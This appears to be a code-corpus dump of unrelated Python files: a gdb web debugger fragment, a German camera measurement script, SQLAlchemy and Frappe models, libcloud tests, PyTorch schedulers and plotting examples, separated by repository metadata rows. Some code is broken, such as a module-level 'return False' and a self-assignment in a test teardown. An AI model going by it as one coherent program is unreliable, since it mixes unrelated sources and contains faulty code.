await delete_gdb_process(sid)
await create_gdb_process(sid)
# Reading registers doesn't work on ubuntu 18.04 for some reason.
# Step once as a work around
step(sid)
async def update_all(sid):
log('updating sid {}'.format(sid))
regs_task = getregs(sid)
maps_task = getmaps(sid)
asm_task = getasm(sid, {'addr': await gdb_sessions[sid].get_reg('rip'), 'count': 100})
await asyncio.gather(regs_task, maps_task, asm_task)
log('update done')
@sio.on('step')
def step(sid):
gdb_sessions[sid].step()
@sio.on('cont')
def cont(sid):
gdb_sessions[sid].cont()
@sio.on('stop')
def stop(sid):
gdb_sessions[sid].interrupt()
async def getregs(sid):
regs = await gdb_sessions[sid].get_regs()
await sio.emit('regs', regs, room=sid)
@sio.on('mem')
async def getmem(sid, msg):
addr = msg['addr']
count = msg['count']
data = gdb_sessions[sid].read_mem(addr, count)
await sio.emit('mem', {'addr': addr, 'data': data}, room=sid)
async def getmaps(sid):
maps = gdb_sessions[sid].maps()
await sio.emit('maps', maps, room=sid)
@sio.on('break')
async def setbreakpoint(sid, data):
addr = data['addr']
await gdb_sessions[sid].set_breakpoint(addr)
await sio.emit('breakpoints', gdb_sessions[sid].breakpoints(), room=sid)
@sio.on('unbreak')
async def rmbreakpoint(sid, data):
addr = data['addr']
await gdb_sessions[sid].remove_breakpoint(addr)
await sio.emit('breakpoints', gdb_sessions[sid].breakpoints(), room=sid)
@sio.on('search')
async def search(sid, data):
q = data['q']
qtype = data['type']
await sio.emit('search_result', gdb_sessions[sid].search(q.encode(), qtype), room=sid)
async def getasm(sid, data):
addr = data['addr']
count = data['count']
result = []
for _ in range(count):
data = gdb_sessions[sid].read_mem(addr, MAX_INSN_LEN)
try:
disasm = next(capstone_md.disasm_lite(data, addr))
except StopIteration:
break
result.append(disasm)
addr += disasm[1]
await sio.emit('asm', result, room=sid)
if __name__ == '__main__':
web.run_app(app)
| 27.960227 | 104 | 0.710018 |
b930187de467bdc99d38231d4b217f6589a62613
| 2,039 |
py
|
Python
|
starteMessung.py
|
jkerpe/TroubleBubble
|
813ad797398b9f338f136bcb96c6c92186d92ebf
|
[
"MIT"
] | null | null | null |
starteMessung.py
|
jkerpe/TroubleBubble
|
813ad797398b9f338f136bcb96c6c92186d92ebf
|
[
"MIT"
] | null | null | null |
starteMessung.py
|
jkerpe/TroubleBubble
|
813ad797398b9f338f136bcb96c6c92186d92ebf
|
[
"MIT"
] | 1 |
2021-08-09T14:57:57.000Z
|
2021-08-09T14:57:57.000Z
|
from datetime import datetime
from pypylon import pylon
import nimmAuf
import smbus2
import os
import argparse
import bestimmeVolumen
from threading import Thread
import time
programmstart = time.time()
# Argumente parsen (bei Aufruf im Terminal z.B. 'starteMessung.py -n 100' eingeben)
ap = argparse.ArgumentParser(description="""Skript zum Aufnehmen von Bildern der Teststrecke und der
Volumenbestimmung von Luftblasen""")
ap.add_argument("-n", "--number", default=400, type=int, help="Anzahl an Frames die aufgenommen werden sollen. Default: 400 Bilder")
ap.add_argument("-fr", "--framerate", default=100, type=int, help="Framerate in fps. Richtwerte: <Flow 3 ml/s:50 fps, 3-6ml/s:100 fps, >6ml/s:200 fps; Default: 100 fps")
args = vars(ap.parse_args())
# Argumente des Parsers extrahieren
numberOfImagesToGrab = args['number']
framerate = args['framerate']
if __name__ == '__main__':
startzeit = time.time()
#Test ob Kamera angeschlossen ist
devices = pylon.TlFactory.GetInstance().EnumerateDevices()
if len(devices) == 0:
print("Keine Kamera angeschlossen oder Kamera woanders geöffnet.")
return False
# Test ob Drucksensor angeschlossen ist
try:
bus = smbus2.SMBus(0)
bus.read_i2c_block_data(0x40, 0, 2) # 2 Bytes empfangen
except OSError:
print("Kein Drucksensor angeschlossen")
exit()
# Aus der aktuellen Zeit und den Parametern einen individuellen Ordnernamen generieren
dirname = f'{datetime.now().strftime("%Y-%m-%d-%H-%M-%S")}'
os.mkdir(dirname) # Ordner erstellen
print(f"Ordnername: {dirname}")
beginn = time.time()-programmstart
# Threads zum Aufnehmen und Verarbeiten starten
t_aufnahme = Thread(target=nimmAuf.starte, args=(dirname, numberOfImagesToGrab, framerate, startzeit))
t_tracke = Thread(target=bestimmeVolumen.tracke, args=(dirname, numberOfImagesToGrab))
t_aufnahme.start()
t_tracke.start()
t_aufnahme.join()
t_tracke.join()
| 34.559322 | 169 | 0.703776 |
b978fbbcd4002601ca1e2723cae4385002e671d8
| 2,063 |
py
|
Python
|
src/onegov/translator_directory/models/language.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/translator_directory/models/language.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/translator_directory/models/language.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from uuid import uuid4
from sqlalchemy import Index, Column, Text, Table, ForeignKey
from sqlalchemy.orm import object_session
from onegov.core.orm import Base
from onegov.core.orm.types import UUID
spoken_association_table = Table(
'spoken_lang_association',
Base.metadata,
Column(
'translator_id',
UUID,
ForeignKey('translators.id'),
nullable=False),
Column('lang_id', UUID, ForeignKey('languages.id'), nullable=False)
)
written_association_table = Table(
'written_lang_association',
Base.metadata,
Column(
'translator_id',
UUID,
ForeignKey('translators.id'),
nullable=False),
Column('lang_id', UUID, ForeignKey('languages.id'), nullable=False)
)
mother_tongue_association_table = Table(
'mother_tongue_association',
Base.metadata,
Column(
'translator_id',
UUID,
ForeignKey('translators.id'),
nullable=False),
Column('lang_id', UUID, ForeignKey('languages.id'), nullable=False)
)
class Language(Base):
__tablename__ = 'languages'
__table_args__ = (
Index('unique_name', 'name', unique=True),
)
id = Column(UUID, primary_key=True, default=uuid4)
name = Column(Text, nullable=False)
@property
def speakers_count(self):
session = object_session(self)
return session.query(
spoken_association_table).filter_by(lang_id=self.id).count()
@property
def writers_count(self):
session = object_session(self)
return session.query(
written_association_table).filter_by(lang_id=self.id).count()
@property
def native_speakers_count(self):
"""Having it as mother tongue..."""
session = object_session(self)
return session.query(
mother_tongue_association_table).filter_by(lang_id=self.id).count()
@property
def deletable(self):
return (
self.speakers_count
+ self.writers_count
+ self.native_speakers_count
) == 0
| 25.469136 | 79 | 0.650994 |
b9b2dd8fc97fddaaa64ec64957043ee8e8088e39
| 615 |
py
|
Python
|
frappe-bench/apps/erpnext/erpnext/non_profit/doctype/member/member.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/non_profit/doctype/member/member.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
frappe-bench/apps/erpnext/erpnext/non_profit/doctype/member/member.py
|
Semicheche/foa_frappe_docker
|
a186b65d5e807dd4caf049e8aeb3620a799c1225
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2017, Frappe Technologies Pvt. Ltd. and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
from frappe.model.document import Document
from frappe.contacts.address_and_contact import load_address_and_contact
class Member(Document):
def onload(self):
"""Load address and contacts in `__onload`"""
load_address_and_contact(self)
def validate(self):
self.validate_email_type(self.email)
def validate_email_type(self, email):
from frappe.utils import validate_email_add
validate_email_add(email.strip(), True)
| 29.285714 | 72 | 0.786992 |
0ec1afd2facbda8f3febe8ca1dc7c71fb6558f04
| 1,993 |
py
|
Python
|
packages/watchmen-data-kernel/src/watchmen_data_kernel/meta/external_writer_service.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
packages/watchmen-data-kernel/src/watchmen_data_kernel/meta/external_writer_service.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
packages/watchmen-data-kernel/src/watchmen_data_kernel/meta/external_writer_service.py
|
Indexical-Metrics-Measure-Advisory/watchmen
|
c54ec54d9f91034a38e51fd339ba66453d2c7a6d
|
[
"MIT"
] | null | null | null |
from typing import Optional
from watchmen_auth import PrincipalService
from watchmen_data_kernel.cache import CacheService
from watchmen_data_kernel.common import DataKernelException
from watchmen_data_kernel.external_writer import find_external_writer_create, register_external_writer_creator
from watchmen_meta.common import ask_meta_storage, ask_snowflake_generator
from watchmen_meta.system import ExternalWriterService as ExternalWriterStorageService
from watchmen_model.common import ExternalWriterId
from watchmen_model.system import ExternalWriter
def register_external_writer(external_writer: ExternalWriter) -> None:
create = find_external_writer_create(external_writer.type)
if create is None:
raise DataKernelException(f'Creator not found for external writer[{external_writer.dict()}].')
register_external_writer_creator(external_writer.writerCode, create())
class ExternalWriterService:
def __init__(self, principal_service: PrincipalService):
self.principalService = principal_service
def find_by_id(self, writer_id: ExternalWriterId) -> Optional[ExternalWriter]:
external_writer = CacheService.external_writer().get(writer_id)
if external_writer is not None:
if external_writer.tenantId != self.principalService.get_tenant_id():
raise DataKernelException(
f'External writer[id={writer_id}] not belongs to '
f'current tenant[id={self.principalService.get_tenant_id()}].')
register_external_writer(external_writer)
return external_writer
storage_service = ExternalWriterStorageService(
ask_meta_storage(), ask_snowflake_generator(), self.principalService)
storage_service.begin_transaction()
try:
# noinspection PyTypeChecker
external_writer: ExternalWriter = storage_service.find_by_id(writer_id)
if external_writer is None:
return None
CacheService.external_writer().put(external_writer)
register_external_writer(external_writer)
return external_writer
finally:
storage_service.close_transaction()
| 41.520833 | 110 | 0.831912 |
16abab9c314c051765ffd991fb6c764e6cf24cb5
| 235 |
py
|
Python
|
solutions/pic_search/webserver/src/service/theardpool.py
|
naetimus/bootcamp
|
0182992df7c54012944b51fe9b70532ab6a0059b
|
[
"Apache-2.0"
] | 1 |
2020-03-10T07:43:08.000Z
|
2020-03-10T07:43:08.000Z
|
solutions/pic_search/webserver/src/service/theardpool.py
|
naetimus/bootcamp
|
0182992df7c54012944b51fe9b70532ab6a0059b
|
[
"Apache-2.0"
] | null | null | null |
solutions/pic_search/webserver/src/service/theardpool.py
|
naetimus/bootcamp
|
0182992df7c54012944b51fe9b70532ab6a0059b
|
[
"Apache-2.0"
] | 1 |
2020-04-03T05:24:47.000Z
|
2020-04-03T05:24:47.000Z
|
import threading
from concurrent.futures import ThreadPoolExecutor
from service.train import do_train
def thread_runner(thread_num, func, *args):
executor = ThreadPoolExecutor(thread_num)
f = executor.submit(do_train, *args)
| 26.111111 | 49 | 0.795745 |
4c0f174360fe29201e22d16e102aa2c61bad20f2
| 262 |
py
|
Python
|
production/pygsl-0.9.5/testing/__init__.py
|
juhnowski/FishingRod
|
457e7afb5cab424296dff95e1acf10ebf70d32a9
|
[
"MIT"
] | 1 |
2019-07-29T02:53:51.000Z
|
2019-07-29T02:53:51.000Z
|
production/pygsl-0.9.5/testing/__init__.py
|
juhnowski/FishingRod
|
457e7afb5cab424296dff95e1acf10ebf70d32a9
|
[
"MIT"
] | 1 |
2021-09-11T14:30:32.000Z
|
2021-09-11T14:30:32.000Z
|
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/pygsl/testing/__init__.py
|
poojavade/Genomics_Docker
|
829b5094bba18bbe03ae97daf925fee40a8476e8
|
[
"Apache-2.0"
] | 2 |
2016-12-19T02:27:46.000Z
|
2019-07-29T02:53:54.000Z
|
"""
Here you find either new implemented modules or alternate implementations
of already modules. This directory is intended to have a second implementation
beside the main implementation to have a discussion which implementation to
favor on the long run.
"""
| 37.428571 | 78 | 0.80916 |
5de70a07393091d4b0d1b81bb83f4335c31b6482
| 3,329 |
py
|
Python
|
Plot/src/test/java/io/deephaven/db/plot/example_plots/PlottingPQ.py
|
devinrsmith/deephaven-core
|
3a6930046faf1cd556f62a914ce1cfd7860147b9
|
[
"MIT"
] | null | null | null |
Plot/src/test/java/io/deephaven/db/plot/example_plots/PlottingPQ.py
|
devinrsmith/deephaven-core
|
3a6930046faf1cd556f62a914ce1cfd7860147b9
|
[
"MIT"
] | 1 |
2022-03-03T21:24:40.000Z
|
2022-03-03T21:24:54.000Z
|
Plot/src/test/java/io/deephaven/db/plot/example_plots/PlottingPQ.py
|
devinrsmith/deephaven-core
|
3a6930046faf1cd556f62a914ce1cfd7860147b9
|
[
"MIT"
] | null | null | null |
import deephaven.TableTools as tt
import deephaven.Plot as plt
t = tt.emptyTable(50)\
.update("X = i + 5", "XLow = X -1", "XHigh = X + 1", "Y = Math.random() * 5", "YLow = Y - 1", "YHigh = Y + 1", "USym = i % 2 == 0 ? `AAPL` : `MSFT`")
p = plt.plot("S1", t, "X", "Y").lineColor("black").show()
p2 = plt.plot("S1", t, "X", "Y").plotStyle("bar").gradientVisible(True).show()
p3 = plt.plot("S1", t, "X", "Y").plotStyle("scatter").pointColor("black").pointSize(2).show()
p4 = plt.plot("S1", t, "X", "Y").plotStyle("area").seriesColor("red").show()
p4 = plt.plot3d("S1", t, "X", "X", "Y").show()
pBy = plt.plotBy("S1", t, "X", "Y", "USym").show()
pBy = plt.plot3dBy("S1", t, "X", "X", "Y", "USym").show()
cp = plt.catPlot("S1", t, "X", "Y").lineColor("black").show()
cp2 = plt.catPlot("S1", t, "X", "Y").plotStyle("bar").gradientVisible(True).show()
cp3 = plt.catPlot("S1", t, "X", "Y").plotStyle("scatter").pointColor("black").pointSize(2).show()
cp4 = plt.catPlot("S1", t, "X", "Y").plotStyle("area").seriesColor("red").show()
cp = plt.catPlot3d("S1", t, "X", "X", "Y").show()
cpBy = plt.catPlotBy("S1", t, "X", "Y", "USym").show()
cpBy = plt.catPlot3dBy("S1", t, "X", "X", "Y", "USym").show()
pp = plt.piePlot("S1", t, "X", "Y")
chp = plt.catHistPlot("S1", t, "X").show()
hp = plt.histPlot("S1", t, "X", 5).show()
hp = plt.histPlot("S1", t, "X", 0, 10, 5).show()
ep = plt.errorBarXY("S1", t, "X", "XLow", "XHigh", "Y", "YLow", "YHigh").show()
epBy = plt.errorBarXYBy("S1", t, "X", "XLow", "XHigh", "Y", "YLow", "YHigh", "USym").show()
ep2 = plt.errorBarX("S1", t, "X", "XLow", "XHigh", "Y").show()
epBy2 = plt.errorBarXBy("S1", t, "X", "XLow", "XHigh", "Y", "USym").show()
ep3 = plt.errorBarY("S1", t, "X", "Y", "YLow", "YHigh").show()
epBy3 = plt.errorBarYBy("S1", t, "X", "Y", "YLow", "YHigh", "USym").show()
doubles = [3, 4, 3, 5, 4, 5]
time = 1491946585000000000
t = tt.newTable(tt.col("USym", ["A", "B", "A", "B", "A", "B"]),
tt.doubleCol("Open", doubles), tt.doubleCol("High", doubles),
tt.doubleCol("Low", doubles), tt.doubleCol("Close", doubles))
t = t.updateView("Time = new DBDateTime(time + (MINUTE * i))")
ohlc = plt.ohlcPlot("Test1", t, "Time", "Open", "High", "Low", "Close")
ohlcPlotBy = plt.figure().newChart(0)\
.chartTitle("Chart Title")\
.newAxes()\
.xLabel("X")\
.yLabel("Y")\
.ohlcPlotBy("Test1", t, "Time", "Open", "High", "Low", "Close", "USym")
categories = ["Samsung", "Others", "Nokia", "Apple", "MSFT"]
valuesD = [27.8, 55.3, 16.8, 17.1, 23.1]
valuesI = [27, 55, 16, 17, 15]
ap = plt.plot("S1", valuesD, valuesI).show()
ap = plt.plot3d("S1", valuesI, valuesI, valuesI).show()
acp = plt.catPlot("S1", categories, valuesI).show()
acp2 = plt.catPlot3d("S1", categories, categories, valuesD).show()
achp = plt.catHistPlot("S1", categories).show()
app = plt.figure().xLabel("X").yLabel("Y").piePlot("S1", categories, valuesI).pointLabelFormat("{0}").show()
aep = plt.errorBarXY("S1", valuesD, valuesD, valuesD, valuesD, valuesD, valuesD).show()
aep2 = plt.errorBarX("S1", valuesD, valuesD, valuesD, valuesD).show()
aep3 = plt.errorBarY("S1", valuesD, valuesD, valuesD, valuesD).show()
hp = plt.histPlot("S1", valuesD, 5).show()
hp = plt.histPlot("S1", valuesD, 0, 10, 5).show()
hp = plt.histPlot("S1", valuesI, 5).show()
| 37.829545 | 153 | 0.578252 |
5df79191a02e9cdc36eab83fa9b24e2f2d9fe213
| 7,695 |
py
|
Python
|
Dockerfiles/gedlab-khmer-filter-abund/pymodules/python2.7/lib/python/apache_libcloud-0.15.1-py2.7.egg/libcloud/test/test_connection.py
|
poojavade/Genomics_Docker
|
829b5094bba18bbe03ae97daf925fee40a8476e8
|
[
"Apache-2.0"
] | 1 |
2019-07-29T02:53:51.000Z
|
2019-07-29T02:53:51.000Z
|
libcloud/test/test_connection.py
|
elastacloud/libcloud
|
f3792b2dca835c548bdbce0da2eb71bfc9463b72
|
[
"Apache-2.0"
] | 1 |
2021-09-11T14:30:32.000Z
|
2021-09-11T14:30:32.000Z
|
libcloud/test/test_connection.py
|
elastacloud/libcloud
|
f3792b2dca835c548bdbce0da2eb71bfc9463b72
|
[
"Apache-2.0"
] | 2 |
2016-12-19T02:27:46.000Z
|
2019-07-29T02:53:54.000Z
|
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one or more§
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import ssl
from mock import Mock, call
from libcloud.test import unittest
from libcloud.common.base import Connection
from libcloud.common.base import LoggingConnection
class ConnectionClassTestCase(unittest.TestCase):
def setUp(self):
self.originalConnect = Connection.connect
self.originalResponseCls = Connection.responseCls
Connection.connect = Mock()
Connection.responseCls = Mock()
Connection.allow_insecure = True
def tearDown(self):
Connection.connect = self.originalConnect
Connection.responseCls = Connection.responseCls
Connection.allow_insecure = True
def test_dont_allow_insecure(self):
Connection.allow_insecure = True
Connection(secure=False)
Connection.allow_insecure = False
expected_msg = (r'Non https connections are not allowed \(use '
'secure=True\)')
self.assertRaisesRegexp(ValueError, expected_msg, Connection,
secure=False)
def test_content_length(self):
con = Connection()
con.connection = Mock()
# GET method
# No data, no content length should be present
con.request('/test', method='GET', data=None)
call_kwargs = con.connection.request.call_args[1]
self.assertTrue('Content-Length' not in call_kwargs['headers'])
# '' as data, no content length should be present
con.request('/test', method='GET', data='')
call_kwargs = con.connection.request.call_args[1]
self.assertTrue('Content-Length' not in call_kwargs['headers'])
# 'a' as data, content length should be present (data in GET is not
# correct, but anyways)
con.request('/test', method='GET', data='a')
call_kwargs = con.connection.request.call_args[1]
self.assertEqual(call_kwargs['headers']['Content-Length'], '1')
# POST, PUT method
# No data, content length should be present
for method in ['POST', 'PUT', 'post', 'put']:
con.request('/test', method=method, data=None)
call_kwargs = con.connection.request.call_args[1]
self.assertEqual(call_kwargs['headers']['Content-Length'], '0')
# '' as data, content length should be present
for method in ['POST', 'PUT', 'post', 'put']:
con.request('/test', method=method, data='')
call_kwargs = con.connection.request.call_args[1]
self.assertEqual(call_kwargs['headers']['Content-Length'], '0')
# No data, raw request, do not touch Content-Length if present
for method in ['POST', 'PUT', 'post', 'put']:
con.request('/test', method=method, data=None,
headers={'Content-Length': '42'}, raw=True)
putheader_call_list = con.connection.putheader.call_args_list
self.assertIn(call('Content-Length', '42'), putheader_call_list)
# '' as data, raw request, do not touch Content-Length if present
for method in ['POST', 'PUT', 'post', 'put']:
con.request('/test', method=method, data=None,
headers={'Content-Length': '42'}, raw=True)
putheader_call_list = con.connection.putheader.call_args_list
self.assertIn(call('Content-Length', '42'), putheader_call_list)
# 'a' as data, content length should be present
for method in ['POST', 'PUT', 'post', 'put']:
con.request('/test', method=method, data='a')
call_kwargs = con.connection.request.call_args[1]
self.assertEqual(call_kwargs['headers']['Content-Length'], '1')
def test_cache_busting(self):
params1 = {'foo1': 'bar1', 'foo2': 'bar2'}
params2 = [('foo1', 'bar1'), ('foo2', 'bar2')]
con = Connection()
con.connection = Mock()
con.pre_connect_hook = Mock()
con.pre_connect_hook.return_value = {}, {}
con.cache_busting = False
con.request(action='/path', params=params1)
args, kwargs = con.pre_connect_hook.call_args
self.assertFalse('cache-busting' in args[0])
self.assertEqual(args[0], params1)
con.request(action='/path', params=params2)
args, kwargs = con.pre_connect_hook.call_args
self.assertFalse('cache-busting' in args[0])
self.assertEqual(args[0], params2)
con.cache_busting = True
con.request(action='/path', params=params1)
args, kwargs = con.pre_connect_hook.call_args
self.assertTrue('cache-busting' in args[0])
con.request(action='/path', params=params2)
args, kwargs = con.pre_connect_hook.call_args
self.assertTrue('cache-busting' in args[0][len(params2)])
def test_context_is_reset_after_request_has_finished(self):
context = {'foo': 'bar'}
def responseCls(connection, response):
connection.called = True
self.assertEqual(connection.context, context)
con = Connection()
con.called = False
con.connection = Mock()
con.responseCls = responseCls
con.set_context(context)
self.assertEqual(con.context, context)
con.request('/')
# Context should have been reset
self.assertTrue(con.called)
self.assertEqual(con.context, {})
# Context should also be reset if a method inside request throws
con = Connection()
con.connection = Mock()
con.set_context(context)
self.assertEqual(con.context, context)
con.connection.request = Mock(side_effect=ssl.SSLError())
try:
con.request('/')
except ssl.SSLError:
pass
self.assertEqual(con.context, {})
con.connection = Mock()
con.set_context(context)
self.assertEqual(con.context, context)
con.responseCls = Mock(side_effect=ValueError())
try:
con.request('/')
except ValueError:
pass
self.assertEqual(con.context, {})
def test_log_curl(self):
url = '/test/path'
body = None
headers = {}
con = LoggingConnection()
con.protocol = 'http'
con.host = 'example.com'
con.port = 80
for method in ['GET', 'POST', 'PUT', 'DELETE']:
cmd = con._log_curl(method=method, url=url, body=body,
headers=headers)
self.assertEqual(cmd, 'curl -i -X %s --compress http://example.com:80/test/path' %
(method))
# Should use --head for head requests
cmd = con._log_curl(method='HEAD', url=url, body=body, headers=headers)
self.assertEqual(cmd, 'curl -i --head --compress http://example.com:80/test/path')
if __name__ == '__main__':
sys.exit(unittest.main())
| 36.995192 | 94 | 0.624172 |
f8d46f993d25bd7f9f34660f23bf18928f5a3963
| 5,672 |
py
|
Python
|
module/classification_package/src/utils.py
|
fishial/Object-Detection-Model
|
4792f65ea785156a8e240d9cdbbc0c9d013ea0bb
|
[
"CC0-1.0"
] | 1 |
2022-01-03T14:00:17.000Z
|
2022-01-03T14:00:17.000Z
|
module/classification_package/src/utils.py
|
fishial/Object-Detection-Model
|
4792f65ea785156a8e240d9cdbbc0c9d013ea0bb
|
[
"CC0-1.0"
] | null | null | null |
module/classification_package/src/utils.py
|
fishial/Object-Detection-Model
|
4792f65ea785156a8e240d9cdbbc0c9d013ea0bb
|
[
"CC0-1.0"
] | 1 |
2021-12-21T09:50:53.000Z
|
2021-12-21T09:50:53.000Z
|
import numpy as np
import logging
import numbers
import torch
import math
import json
import sys
from torch.optim.lr_scheduler import LambdaLR
from torchvision.transforms.functional import pad
class AverageMeter(object):
"""Computes and stores the average and current value"""
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
class ConstantLRSchedule(LambdaLR):
""" Constant learning rate schedule.
"""
def __init__(self, optimizer, last_epoch=-1):
super(ConstantLRSchedule, self).__init__(optimizer, lambda _: 1.0, last_epoch=last_epoch)
class WarmupConstantSchedule(LambdaLR):
""" Linear warmup and then constant.
Linearly increases learning rate schedule from 0 to 1 over `warmup_steps` training steps.
Keeps learning rate schedule equal to 1. after warmup_steps.
"""
def __init__(self, optimizer, warmup_steps, last_epoch=-1):
self.warmup_steps = warmup_steps
super(WarmupConstantSchedule, self).__init__(optimizer, self.lr_lambda, last_epoch=last_epoch)
def lr_lambda(self, step):
if step < self.warmup_steps:
return float(step) / float(max(1.0, self.warmup_steps))
return 1.
class WarmupLinearSchedule(LambdaLR):
""" Linear warmup and then linear decay.
Linearly increases learning rate from 0 to 1 over `warmup_steps` training steps.
Linearly decreases learning rate from 1. to 0. over remaining `t_total - warmup_steps` steps.
"""
def __init__(self, optimizer, warmup_steps, t_total, last_epoch=-1):
self.warmup_steps = warmup_steps
self.t_total = t_total
super(WarmupLinearSchedule, self).__init__(optimizer, self.lr_lambda, last_epoch=last_epoch)
def lr_lambda(self, step):
if step < self.warmup_steps:
return float(step) / float(max(1, self.warmup_steps))
return max(0.0, float(self.t_total - step) / float(max(1.0, self.t_total - self.warmup_steps)))
class WarmupCosineSchedule(LambdaLR):
""" Linear warmup and then cosine decay.
Linearly increases learning rate from 0 to 1 over `warmup_steps` training steps.
Decreases learning rate from 1. to 0. over remaining `t_total - warmup_steps` steps following a cosine curve.
If `cycles` (default=0.5) is different from default, learning rate follows cosine function after warmup.
"""
def __init__(self, optimizer, warmup_steps, t_total, cycles=.5, last_epoch=-1):
self.warmup_steps = warmup_steps
self.t_total = t_total
self.cycles = cycles
super(WarmupCosineSchedule, self).__init__(optimizer, self.lr_lambda, last_epoch=last_epoch)
def lr_lambda(self, step):
if step < self.warmup_steps:
return float(step) / float(max(1.0, self.warmup_steps))
# progress after warmup
progress = float(step - self.warmup_steps) / float(max(1, self.t_total - self.warmup_steps))
return max(0.0, 0.5 * (1. + math.cos(math.pi * float(self.cycles) * 2.0 * progress)))
def get_padding(image):
w, h = image.size
max_wh = np.max([w, h])
h_padding = (max_wh - w) / 2
v_padding = (max_wh - h) / 2
l_pad = h_padding if h_padding % 1 == 0 else h_padding + 0.5
t_pad = v_padding if v_padding % 1 == 0 else v_padding + 0.5
r_pad = h_padding if h_padding % 1 == 0 else h_padding - 0.5
b_pad = v_padding if v_padding % 1 == 0 else v_padding - 0.5
padding = (int(l_pad), int(t_pad), int(r_pad), int(b_pad))
return padding
class NewPad(object):
def __init__(self, fill=0, padding_mode='constant'):
assert isinstance(fill, (numbers.Number, str, tuple))
assert padding_mode in ['constant', 'edge', 'reflect', 'symmetric']
self.fill = fill
self.padding_mode = padding_mode
def __call__(self, img):
"""
Args:
img (PIL Image): Image to be padded.
Returns:
PIL Image: Padded image.
"""
return pad(img, get_padding(img), self.fill, self.padding_mode)
def __repr__(self):
return self.__class__.__name__ + '(padding={0}, fill={1}, padding_mode={2})'. \
format(self.fill, self.padding_mode)
def find_device():
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
return device
def read_json(data):
with open(data) as f:
return json.load(f)
def save_json(data, path):
with open(path, 'w', encoding='utf-8') as f:
json.dump(data, f)
def setup_logger():
logger = logging.getLogger('train')
logger.setLevel(logging.INFO)
if len(logger.handlers) == 0:
formatter = logging.Formatter('%(asctime)s | %(message)s')
ch = logging.StreamHandler(stream=sys.stdout)
ch.setFormatter(formatter)
logger.addHandler(ch)
return logger
def adjust_learning_rate(optimizer, epoch, lr):
"""Sets the learning rate to the initial LR decayed by 10 every 30 epochs"""
lr = lr * (0.1 ** (epoch // 30))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
def save_checkpoint(model, path):
torch.save(model.state_dict(), path)
def reverse_norm_image(image):
MEAN = torch.tensor([0.485, 0.456, 0.406])
STD = torch.tensor([0.229, 0.224, 0.225])
reverse_image = image * STD[:, None, None] + MEAN[:, None, None]
return reverse_image.permute(1, 2, 0).cpu().numpy()
| 33.761905 | 117 | 0.653738 |
5d1d5be9e9e0382909fb3777ed89becc272c0e93
| 767 |
py
|
Python
|
Kapitel_1/_1_public_private.py
|
Geralonx/Classes_Tutorial
|
9499db8159efce1e3c38975b66a9c649631c6727
|
[
"MIT"
] | 1 |
2020-12-24T15:42:54.000Z
|
2020-12-24T15:42:54.000Z
|
Kapitel_1/_1_public_private.py
|
Geralonx/Classes_Tutorial
|
9499db8159efce1e3c38975b66a9c649631c6727
|
[
"MIT"
] | null | null | null |
Kapitel_1/_1_public_private.py
|
Geralonx/Classes_Tutorial
|
9499db8159efce1e3c38975b66a9c649631c6727
|
[
"MIT"
] | null | null | null |
# --- Klassendeklaration mit Konstruktor --- #
class PC:
def __init__(self, cpu, gpu, ram):
self.cpu = cpu
self.gpu = gpu
self.__ram = ram
# --- Instanziierung einer Klasse ---#
# --- Ich bevorzuge die Initialisierung mit den Keywords --- #
pc_instanz = PC(cpu='Ryzen 7', gpu='RTX2070Super', ram='GSkill')
# --- Zugriff auf normale _public_ Attribute --- #
print(pc_instanz.cpu)
print(pc_instanz.gpu)
# --- Zugriff auf ein _privates_ Attribut --- #
# Auskommentiert, da es einen AttributeError schmeißt.
# print(pc_instanz.__ram)
# --- Zugriff auf das Instanz-Dictionary, um die Inhalte jener Instanz zu erhalten. --- #
print(pc_instanz.__dict__)
# --- Zugriff auf das eigentlich _private_ Attribut. --- #
print(pc_instanz._PC__ram)
| 29.5 | 89 | 0.684485 |
5d66ef032fbd2dcf091b5ffde482a5d596613146
| 1,940 |
py
|
Python
|
bin/write2cly.py
|
docdiesel/smartmetertools
|
3b7449c7a9069696af078631aa5440f53d0f57bc
|
[
"MIT"
] | 1 |
2019-05-30T08:28:31.000Z
|
2019-05-30T08:28:31.000Z
|
bin/write2cly.py
|
docdiesel/smartmetertools
|
3b7449c7a9069696af078631aa5440f53d0f57bc
|
[
"MIT"
] | null | null | null |
bin/write2cly.py
|
docdiesel/smartmetertools
|
3b7449c7a9069696af078631aa5440f53d0f57bc
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
## write2cly.py - reads json (generated by sml_reader.py) from stdin
## - writes values to Corlysis time series InfluxDB
##
## Writes data from smart meter to time series database (InfluxDB)
